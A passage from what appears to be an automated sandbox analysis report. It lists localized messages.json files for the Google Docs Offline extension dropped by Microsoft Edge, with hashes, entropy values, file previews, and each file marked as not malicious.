                                                                                                                                                                                                                                                                                                      SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                      SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                      SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                      MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                      SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                      SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                      SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):972
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                      MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                      SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                      SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                      SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):990
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                      MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                      SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                      SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                      SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1658
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                      MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                      SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                      SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                      SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1672
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                      MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                      SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                      SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                      SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):935
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                      MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                      SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                      SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                      SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1065
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                      MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                      SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                      SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                      SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2771
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                      MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                      SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                      SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                      SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):858
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                      MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                      SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                      SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                      SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):954
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                      MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                      SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                      SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                      SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):899
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                      MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                      SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                      SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                      SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2230
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                      MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                      SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                      SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                      SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1160
